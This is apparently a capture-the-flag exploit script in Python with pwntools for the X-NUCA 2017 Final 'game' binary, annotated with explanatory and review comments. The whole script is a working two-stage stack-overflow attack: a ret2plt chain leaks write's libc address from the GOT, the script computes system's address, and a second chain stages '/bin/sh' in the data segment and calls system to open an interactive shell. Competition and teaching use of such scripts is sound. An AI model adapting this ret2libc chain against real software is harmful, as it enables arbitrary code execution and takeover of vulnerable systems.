#!/usr/bin/env python
# -*- coding: utf-8 -*-
# For: X-NUCA 2017 Final
# Game: Personal Challenges Pwn
from pwn import *
# pwntools context: trace every send/recv on the process at debug level.
context.log_level = 'debug'

# Target binary and the 32-bit libc the author expects it to load.
# NOTE(review): the libc path is host-specific; the system address computed
# later is only valid if the running process maps this exact library.
libc = ELF('/lib32/libc.so.6')
file = ELF('./game')  # NOTE: shadows the Python 2 builtin `file`

# Spawn the target locally (no remote variant on this page).
Io = process("./game")

# GOT slots (where the leak reads a libc pointer from) and PLT stubs
# (what the return chain calls).
read_got, write_got = file.got['read'], file.got['write']
write_plt, read_plt = file.plt['write'], file.plt['read']

# libc-relative symbol offsets; the difference between two of them translates
# a leaked write address into the system address under the same mapping.
read_offset = libc.symbols['read']
write_offset = libc.symbols['write']
system_offset = libc.symbols['system']

# Fixed addresses in the binary (0x0804xxxx, i.e. non-PIE; with PIE enabled these
# constants would not be stable).  `start` is hard-coded rather than resolved
# via file.symbols['__libc_start_main'] (the author left that lookup commented
# out); data_seg_addr is a writable slot in the data segment used to stage a string.
start = 0x080484A0
data_seg_addr = 0x0804A02C

# Standard file descriptors and the i386 word size.
STDIN = 0
STDOUT = 1
WORD_SIZE = 4
def touch():
    """Replay the menu interaction that precedes each payload send.

    Waits for the game's ``>`` prompt, then sends the same four answers the
    original script sends, in the same order.  The caller sends the actual
    payload afterwards.
    """
    Io.readuntil(">")
    for answer in ("1\r", "admin", "3", "4"):
        Io.sendline(answer)
# Stage 1 (leak): overwrite the saved return address with a ret2plt chain that
# performs write(STDOUT, write_got, WORD_SIZE) -- printing the libc address of
# write stored in the GOT -- and then returns into `start` so the program
# restarts and can be driven a second time.
# call write(stdout, write_plt, 4)
# return to __libc_start_main
touch()
# Padding up to (presumably) the saved return address: 20 bytes for this binary.
junk = "A" * 20
payload = junk
payload += p32(write_plt)   # overwritten return address -> write@plt
payload += p32(start)       # write's return address -> restart the binary
payload += p32(STDOUT)      # write arg 1: fd
payload += p32(write_got)   # write arg 2: buffer = GOT slot holding write's libc address
payload += p32(WORD_SIZE)   # write arg 3: count = one 4-byte pointer
print "Payload: %r" % (payload)
Io.sendline(payload)
# Skip the prompt text the program prints before the leaked pointer.
# NOTE(review): this assumes the whole banner plus the 4 leaked bytes arrive
# in a single Io.read(); a shorter read would make the slice shorter than 4 bytes.
length_to_ignore = len("Please input your name:\n>>Please enter a temporary marker to resume game progress later :)\nSave Success :)\n")
write_addr = u32(Io.read()[length_to_ignore:length_to_ignore + WORD_SIZE])
print "write_addr: %08x" % (write_addr)
# Same libc mapping => same distance between write and system, so the leaked
# address plus the symbol-offset difference gives system's runtime address.
system_addr = system_offset - write_offset + write_addr
print "system_addr: %08x" % (system_addr)
# Stage 2: read(STDIN, data_seg_addr, 9) stores the command string sent below
# into the data segment, then the chain returns into system(data_seg_addr).
# call read(stdin, data_seg_addr, len('/bin/sh\x00'))
# then return and call system('/bin/sh')
touch()
payload = junk
payload += p32(read_plt)               # overwritten return address -> read@plt
payload += p32(system_addr)            # read's return address -> system (computed in stage 1)
payload += p32(0)                      # read arg 1: fd = STDIN
payload += p32(data_seg_addr)          # read arg 2: destination buffer in .data
payload += p32(len("/bin/sh\x00") + 1) # read arg 3: count (9, one more than the string length)
payload += p32(0)                      # placeholder return address for system
payload += p32(data_seg_addr)          # system arg 1: pointer to the staged command string
print "Payload: %r" % (payload)
Io.sendline(payload)
# These are the bytes read() copies to data_seg_addr (sendline appends "\n").
Io.sendline("/bin/sh")
Io.interactive()